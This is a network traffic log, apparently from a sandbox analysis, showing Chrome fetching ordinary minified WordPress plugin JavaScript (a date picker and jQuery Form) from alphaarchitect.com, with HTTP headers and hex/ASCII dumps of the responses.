                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 74 29 7b 72 65 74 75 72 6e 21 6b 28 72 2c 74 29 7d 29 2c 4f 74 28 6e 2c 65 2c 74 29 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 45 74 28 6e 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 66 2e 63 61 6c 6c 28 6e 2c 30 2c 4d 61 74 68 2e 6d 61 78 28 30 2c 6e 2e 6c 65 6e 67 74 68 2d 28 6e 75 6c 6c 3d 3d 74 7c 7c 72 3f 31 3a 74 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 6e 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 2e 6c 65 6e 67 74 68 3c 31 3f 6e 75 6c 6c 3d 3d 74 7c 7c 72 3f 76 6f 69 64 20 30 3a 5b 5d 3a 6e 75 6c 6c 3d 3d 74 7c 7c 72 3f 6e 5b 30 5d 3a 45 74 28 6e 2c 6e 2e 6c 65 6e 67 74 68 2d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 52 28 6e 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 66 2e 63 61 6c 6c 28 6e 2c 6e 75 6c 6c 3d 3d 74 7c 7c 72 3f 31 3a 74
                                                                                                                                                                                                                                                                        Data Ascii: t){return!k(r,t)}),Ot(n,e,t)});function Et(n,t,r){return f.call(n,0,Math.max(0,n.length-(null==t||r?1:t)))}function Bt(n,t,r){return null==n||n.length<1?null==t||r?void 0:[]:null==t||r?n[0]:Et(n,n.length-t)}function R(n,t,r){return f.call(n,null==t||r?1:t


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        63192.168.2.449819141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC589OUTGET /wp-content/plugins/ultimate-member/assets/libs/pickadate/picker.min.js?ver=3.6.2 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:52 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-2074"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147809
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9ebbcc10c7c-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC877INData Raw: 32 30 37 34 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 70 69 63 6b 65 72 22 2c 5b 22 6a 71 75 65 72 79 22 5d 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 29 3a 74 68 69 73 2e 50 69 63 6b 65 72 3d 65 28 6a 51 75 65 72 79 29 7d 28 66 75 6e 63 74 69 6f 6e 28 68 29 7b 76 61 72 20 6f 3d 68 28 77 69 6e 64 6f 77 29 2c 6d 3d 68 28 64 6f 63 75 6d 65 6e 74 29 2c 72 3d 68 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 2c 67 3d 6e 75 6c 6c 21 3d 64 6f 63 75
                                                                                                                                                                                                                                                                        Data Ascii: 2074!function(e){"function"==typeof define&&define.amd?define("picker",["jquery"],e):"object"==typeof exports?module.exports=e(require("jquery")):this.Picker=e(jQuery)}(function(h){var o=h(window),m=h(document),r=h(document.documentElement),g=null!=docu
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 6c 28 29 2c 73 2e 66 6f 72 6d 61 74 53 75 62 6d 69 74 26 26 28 21 30 3d 3d 3d 73 2e 68 69 64 64 65 6e 4e 61 6d 65 3f 28 65 3d 72 2e 6e 61 6d 65 2c 72 2e 6e 61 6d 65 3d 22 22 29 3a 65 3d 28 65 3d 5b 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 73 2e 68 69 64 64 65 6e 50 72 65 66 69 78 3f 73 2e 68 69 64 64 65 6e 50 72 65 66 69 78 3a 22 22 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 73 2e 68 69 64 64 65 6e 53 75 66 66 69 78 3f 73 2e 68 69 64 64 65 6e 53 75 66 66 69 78 3a 22 5f 73 75 62 6d 69 74 22 5d 29 5b 30 5d 2b 72 2e 6e 61 6d 65 2b 65 5b 31 5d 2c 75 2e 5f 68 69 64 64 65 6e 3d 68 28 27 3c 69 6e 70 75 74 20 74 79 70 65 3d 68 69 64 64 65 6e 20 6e 61 6d 65 3d 22 27 2b 65 2b 27 22 27 2b 28 63 2e 64 61 74 61 28 22 76 61 6c 75 65 22 29 7c 7c 72
                                                                                                                                                                                                                                                                        Data Ascii: l(),s.formatSubmit&&(!0===s.hiddenName?(e=r.name,r.name=""):e=(e=["string"==typeof s.hiddenPrefix?s.hiddenPrefix:"","string"==typeof s.hiddenSuffix?s.hiddenSuffix:"_submit"])[0]+r.name+e[1],u._hidden=h('<input type=hidden name="'+e+'"'+(c.data("value")||r
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 2c 72 2e 61 75 74 6f 66 6f 63 75 73 26 26 75 2e 6f 70 65 6e 28 29 2c 75 2e 74 72 69 67 67 65 72 28 22 73 74 61 72 74 22 29 2e 74 72 69 67 67 65 72 28 22 72 65 6e 64 65 72 22 29 29 7d 2c 72 65 6e 64 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 3f 28 75 2e 24 68 6f 6c 64 65 72 3d 68 28 61 28 29 29 2c 6c 28 29 2c 75 2e 24 72 6f 6f 74 2e 68 74 6d 6c 28 75 2e 24 68 6f 6c 64 65 72 29 29 3a 75 2e 24 72 6f 6f 74 2e 66 69 6e 64 28 22 2e 22 2b 69 2e 62 6f 78 29 2e 68 74 6d 6c 28 75 2e 63 6f 6d 70 6f 6e 65 6e 74 2e 6e 6f 64 65 73 28 64 2e 6f 70 65 6e 29 29 2c 75 2e 74 72 69 67 67 65 72 28 22 72 65 6e 64 65 72 22 29 7d 2c 73 74 6f 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 2e 73 74 61 72 74 26 26 28 75 2e 63 6c 6f 73 65 28
                                                                                                                                                                                                                                                                        Data Ascii: ,r.autofocus&&u.open(),u.trigger("start").trigger("render"))},render:function(e){return e?(u.$holder=h(a()),l(),u.$root.html(u.$holder)):u.$root.find("."+i.box).html(u.component.nodes(d.open)),u.trigger("render")},stop:function(){return d.start&&(u.close(
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 26 26 75 2e 63 6c 6f 73 65 28 21 30 29 29 29 7d 29 29 2c 75 2e 74 72 69 67 67 65 72 28 22 6f 70 65 6e 22 29 29 7d 2c 63 6c 6f 73 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 28 73 2e 65 64 69 74 61 62 6c 65 3f 72 2e 66 6f 63 75 73 28 29 3a 28 75 2e 24 68 6f 6c 64 65 72 2e 6f 66 66 28 22 66 6f 63 75 73 2e 74 6f 4f 70 65 6e 22 29 2e 66 6f 63 75 73 28 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 75 2e 24 68 6f 6c 64 65 72 2e 6f 6e 28 22 66 6f 63 75 73 2e 74 6f 4f 70 65 6e 22 2c 66 29 7d 2c 30 29 29 29 2c 63 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 69 2e 61 63 74 69 76 65 29 2c 24 28 72 2c 22 65 78 70 61 6e 64 65 64 22 2c 21 31 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 75 2e 24
                                                                                                                                                                                                                                                                        Data Ascii: &&u.close(!0)))})),u.trigger("open"))},close:function(e){return e&&(s.editable?r.focus():(u.$holder.off("focus.toOpen").focus(),setTimeout(function(){u.$holder.on("focus.toOpen",f)},0))),c.removeClass(i.active),$(r,"expanded",!1),setTimeout(function(){u.$
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 6d 65 73 43 6f 75 6e 74 3b 6e 2b 3d 31 29 28 65 3d 74 5b 6e 5d 29 69 6e 20 64 2e 6d 65 74 68 6f 64 73 26 26 64 65 6c 65 74 65 20 64 2e 6d 65 74 68 6f 64 73 5b 65 5d 3b 72 65 74 75 72 6e 20 75 7d 2c 74 72 69 67 67 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 28 65 3d 64 2e 6d 65 74 68 6f 64 73 5b 65 5d 29 26 26 65 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 2e 5f 2e 74 72 69 67 67 65 72 28 65 2c 75 2c 5b 74 5d 29 7d 29 7d 72 65 74 75 72 6e 20 6e 28 22 5f 22 2b 65 29 2c 6e 28 65 29 2c 75 7d 7d 2c 6e 65 77 20 65 29 3a 76 3b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 72 65 74 75 72 6e 20 76 2e 5f 2e 6e 6f 64 65 28 22 64 69 76 22 2c 76 2e 5f 2e 6e 6f 64 65 28 22 64 69 76 22 2c 76 2e 5f 2e 6e 6f 64 65 28 22
                                                                                                                                                                                                                                                                        Data Ascii: mesCount;n+=1)(e=t[n])in d.methods&&delete d.methods[e];return u},trigger:function(e,t){function n(e){(e=d.methods[e])&&e.map(function(e){v._.trigger(e,u,[t])})}return n("_"+e),n(e),u}},new e):v;function a(){return v._.node("div",v._.node("div",v._.node("
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC1369INData Raw: 26 75 2e 63 6f 6d 70 6f 6e 65 6e 74 2e 6b 65 79 5b 74 5d 29 26 26 28 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 65 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 2c 6e 3f 75 2e 63 6c 65 61 72 28 29 2e 63 6c 6f 73 65 28 29 3a 75 2e 6f 70 65 6e 28 29 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 79 28 29 7b 69 66 28 72 2e 68 65 69 67 68 74 28 29 3c 3d 6f 2e 68 65 69 67 68 74 28 29 29 72 65 74 75 72 6e 20 30 3b 76 61 72 20 65 3d 68 28 27 3c 64 69 76 20 73 74 79 6c 65 3d 22 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 77 69 64 74 68 3a 31 30 30 70 78 22 20 2f 3e 27 29 2e 61 70 70 65 6e 64 54 6f 28 22 62 6f 64 79 22 29 2c 74 3d 65 5b 30 5d 2e 6f 66 66 73 65 74 57 69 64 74 68 3b 65 2e 63 73 73 28 22 6f 76 65 72 66 6c 6f 77 22 2c 22 73 63 72
                                                                                                                                                                                                                                                                        Data Ascii: &u.component.key[t])&&(e.preventDefault(),e.stopPropagation(),n?u.clear().close():u.open())}}function y(){if(r.height()<=o.height())return 0;var e=h('<div style="visibility:hidden;width:100px" />').appendTo("body"),t=e[0].offsetWidth;e.css("overflow","scr
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC594INData Raw: 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 2f 5c 64 2f 2e 74 65 73 74 28 65 5b 31 5d 29 3f 32 3a 31 7d 2c 69 73 44 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 2d 31 3c 7b 7d 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 69 6e 64 65 78 4f 66 28 22 44 61 74 65 22 29 26 26 74 68 69 73 2e 69 73 49 6e 74 65 67 65 72 28 65 2e 67 65 74 44 61 74 65 28 29 29 7d 2c 69 73 49 6e 74 65 67 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 2d 31 3c 7b 7d 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 69 6e 64 65 78 4f 66 28 22 4e 75 6d 62 65 72 22 29 26 26 65 25 31 3d 3d 30 7d 2c 61 72 69 61 41 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 68 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 65 29 7c 7c 28 65 3d
                                                                                                                                                                                                                                                                        Data Ascii: nction(e){return/\d/.test(e[1])?2:1},isDate:function(e){return-1<{}.toString.call(e).indexOf("Date")&&this.isInteger(e.getDate())},isInteger:function(e){return-1<{}.toString.call(e).indexOf("Number")&&e%1==0},ariaAttr:function(e,t){h.isPlainObject(e)||(e=
                                                                                                                                                                                                                                                                        2024-12-20 12:44:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        64192.168.2.449822141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC810OUTGET /wp-content/plugins/ultimate-member/assets/libs/jquery-form/jquery-form.min.js?ver=2.9.1 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:53 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-3874"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147810
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9f2e952428b-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC877INData Raw: 33 38 37 34 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 65 29 3a 65 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 3f 6a 51 75 65 72 79 3a 77 69 6e 64 6f 77 2e 5a 65 70 74 6f 29 7d 28 66 75 6e 63 74 69 6f 6e 28 4c 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 3d 7b 7d 2c 74 3d 28 68 2e 66 69 6c 65 61 70 69 3d 76 6f 69 64 20 30 21 3d 3d 4c 28 22 3c 69 6e 70 75 74 20 74 79 70 65 3d 27 66 69 6c 65 27 2f 3e 22 29 2e 67 65 74 28 30 29 2e 66 69 6c 65 73 2c 68 2e 66 6f 72 6d 64 61 74 61 3d 76 6f 69 64 20 30 21
                                                                                                                                                                                                                                                                        Data Ascii: 3874!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery"],e):e("undefined"!=typeof jQuery?jQuery:window.Zepto)}(function(L){"use strict";var h={},t=(h.fileapi=void 0!==L("<input type='file'/>").get(0).files,h.formdata=void 0!
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 66 6f 72 6d 5d 20 22 2b 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 6a 6f 69 6e 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 22 22 29 2c 77 69 6e 64 6f 77 2e 63 6f 6e 73 6f 6c 65 26 26 77 69 6e 64 6f 77 2e 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 3f 77 69 6e 64 6f 77 2e 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 29 3a 77 69 6e 64 6f 77 2e 6f 70 65 72 61 26 26 77 69 6e 64 6f 77 2e 6f 70 65 72 61 2e 70 6f 73 74 45 72 72 6f 72 26 26 77 69 6e 64 6f 77 2e 6f 70 65 72 61 2e 70 6f 73 74 45 72 72 6f 72 28 65 29 29 7d 4c 2e 66 6e 2e 61 74 74 72 32 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 20 74 26 26 28 28 65 3d 74 68 69 73 2e 70 72 6f 70 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 29 26 26 65 2e 6a 71 75 65 72 79 7c
                                                                                                                                                                                                                                                                        Data Ascii: form] "+Array.prototype.join.call(arguments,""),window.console&&window.console.log?window.console.log(e):window.opera&&window.opera.postError&&window.opera.postError(e))}L.fn.attr2=function(){var e;return t&&((e=this.prop.apply(this,arguments))&&e.jquery|
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 69 64 61 74 65 20 74 72 69 67 67 65 72 22 29 3b 65 6c 73 65 7b 76 61 72 20 72 2c 6f 2c 69 2c 65 3d 4c 2e 70 61 72 61 6d 28 61 2c 74 29 2c 73 3d 28 75 26 26 28 65 3d 65 3f 65 2b 22 26 22 2b 75 3a 75 29 2c 22 47 45 54 22 3d 3d 63 2e 74 79 70 65 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3f 28 63 2e 75 72 6c 2b 3d 28 30 3c 3d 63 2e 75 72 6c 2e 69 6e 64 65 78 4f 66 28 22 3f 22 29 3f 22 26 22 3a 22 3f 22 29 2b 65 2c 63 2e 64 61 74 61 3d 6e 75 6c 6c 29 3a 63 2e 64 61 74 61 3d 65 2c 5b 5d 29 3b 63 2e 72 65 73 65 74 46 6f 72 6d 26 26 73 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 45 2e 72 65 73 65 74 46 6f 72 6d 28 29 7d 29 2c 63 2e 63 6c 65 61 72 46 6f 72 6d 26 26 73 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 45 2e 63 6c 65 61 72 46 6f 72 6d 28 63
                                                                                                                                                                                                                                                                        Data Ascii: idate trigger");else{var r,o,i,e=L.param(a,t),s=(u&&(e=e?e+"&"+u:u),"GET"==c.type.toUpperCase()?(c.url+=(0<=c.url.indexOf("?")?"&":"?")+e,c.data=null):c.data=e,[]);c.resetForm&&s.push(function(){E.resetForm()}),c.clearForm&&s.push(function(){E.clearForm(c
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 74 75 72 6e 20 6f 7d 28 63 2e 65 78 74 72 61 44 61 74 61 29 3b 66 6f 72 28 74 3d 30 3b 74 3c 72 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 72 5b 74 5d 26 26 61 2e 61 70 70 65 6e 64 28 72 5b 74 5d 5b 30 5d 2c 72 5b 74 5d 5b 31 5d 29 7d 63 2e 64 61 74 61 3d 6e 75 6c 6c 3b 76 61 72 20 6e 3d 4c 2e 65 78 74 65 6e 64 28 21 30 2c 7b 7d 2c 4c 2e 61 6a 61 78 53 65 74 74 69 6e 67 73 2c 63 2c 7b 63 6f 6e 74 65 6e 74 54 79 70 65 3a 21 31 2c 70 72 6f 63 65 73 73 44 61 74 61 3a 21 31 2c 63 61 63 68 65 3a 21 31 2c 74 79 70 65 3a 41 7c 7c 22 50 4f 53 54 22 7d 29 3b 63 2e 75 70 6c 6f 61 64 50 72 6f 67 72 65 73 73 26 26 28 6e 2e 78 68 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 4c 2e 61 6a 61 78 53 65 74 74 69 6e 67 73 2e 78 68 72 28 29 3b 72 65 74 75 72 6e 20 65 2e
                                                                                                                                                                                                                                                                        Data Ascii: turn o}(c.extraData);for(t=0;t<r.length;t++)r[t]&&a.append(r[t][0],r[t][1])}c.data=null;var n=L.extend(!0,{},L.ajaxSettings,c,{contentType:!1,processData:!1,cache:!1,type:A||"POST"});c.uploadProgress&&(n.xhr=function(){var e=L.ajaxSettings.xhr();return e.
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 63 74 69 6f 6e 28 29 7b 7d 2c 73 65 74 52 65 71 75 65 73 74 48 65 61 64 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 61 62 6f 72 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 74 69 6d 65 6f 75 74 22 3d 3d 3d 65 3f 22 74 69 6d 65 6f 75 74 22 3a 22 61 62 6f 72 74 65 64 22 3b 4d 28 22 61 62 6f 72 74 69 6e 67 20 75 70 6c 6f 61 64 2e 2e 2e 20 22 2b 74 29 2c 74 68 69 73 2e 61 62 6f 72 74 65 64 3d 31 3b 74 72 79 7b 6d 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 65 78 65 63 43 6f 6d 6d 61 6e 64 26 26 6d 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 65 78 65 63 43 6f 6d 6d 61 6e 64 28 22 53 74 6f 70 22 29 7d 63 61 74 63 68 28 65 29 7b 7d 66 2e 61 74 74 72 28 22 73 72 63 22 2c 6c 2e 69 66 72
                                                                                                                                                                                                                                                                        Data Ascii: ction(){},setRequestHeader:function(){},abort:function(e){var t="timeout"===e?"timeout":"aborted";M("aborting upload... "+t),this.aborted=1;try{m.contentWindow.document.execCommand&&m.contentWindow.document.execCommand("Stop")}catch(e){}f.attr("src",l.ifr
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 6f 6e 73 65 58 4d 4c 3a 65 2e 72 65 73 70 6f 6e 73 65 54 65 78 74 3b 72 65 74 75 72 6e 20 6e 26 26 22 70 61 72 73 65 72 65 72 72 6f 72 22 3d 3d 3d 65 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 6e 6f 64 65 4e 61 6d 65 26 26 4c 2e 65 72 72 6f 72 26 26 4c 2e 65 72 72 6f 72 28 22 70 61 72 73 65 72 65 72 72 6f 72 22 29 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 28 65 3d 61 26 26 61 2e 64 61 74 61 46 69 6c 74 65 72 3f 61 2e 64 61 74 61 46 69 6c 74 65 72 28 65 2c 74 29 3a 65 29 26 26 28 22 6a 73 6f 6e 22 3d 3d 3d 74 7c 7c 21 74 26 26 30 3c 3d 72 2e 69 6e 64 65 78 4f 66 28 22 6a 73 6f 6e 22 29 3f 65 3d 69 28 65 29 3a 28 22 73 63 72 69 70 74 22 3d 3d 3d 74 7c 7c 21 74 26 26 30 3c 3d 72 2e 69 6e 64 65 78 4f 66 28 22 6a 61 76 61 73 63 72 69 70 74 22
                                                                                                                                                                                                                                                                        Data Ascii: onseXML:e.responseText;return n&&"parsererror"===e.documentElement.nodeName&&L.error&&L.error("parsererror"),"string"==typeof(e=a&&a.dataFilter?a.dataFilter(e,t):e)&&("json"===t||!t&&0<=r.indexOf("json")?e=i(e):("script"===t||!t&&0<=r.indexOf("javascript"
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC1369INData Raw: 2c 6d 2e 61 74 74 61 63 68 45 76 65 6e 74 3f 6d 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 44 29 3a 6d 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 44 2c 21 31 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 74 72 79 7b 76 61 72 20 74 3d 6b 28 6d 29 2e 72 65 61 64 79 53 74 61 74 65 3b 4d 28 22 73 74 61 74 65 20 3d 20 22 2b 74 29 2c 74 26 26 22 75 6e 69 6e 69 74 69 61 6c 69 7a 65 64 22 3d 3d 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 26 26 73 65 74 54 69 6d 65 6f 75 74 28 65 2c 35 30 29 7d 63 61 74 63 68 28 65 29 7b 4d 28 22 53 65 72 76 65 72 20 61 62 6f 72 74 3a 20 22 2c 65 2c 22 20 28 22 2c 65 2e 6e 61 6d 65 2c 22 29 22 29 2c 44 28 76 29 2c 68 26 26 63 6c 65 61 72 54 69
                                                                                                                                                                                                                                                                        Data Ascii: ,m.attachEvent?m.attachEvent("onload",D):m.addEventListener("load",D,!1),setTimeout(function e(){try{var t=k(m).readyState;M("state = "+t),t&&"uninitialized"==t.toLowerCase()&&setTimeout(e,50)}catch(e){M("Server abort: ",e," (",e.name,")"),D(v),h&&clearTi
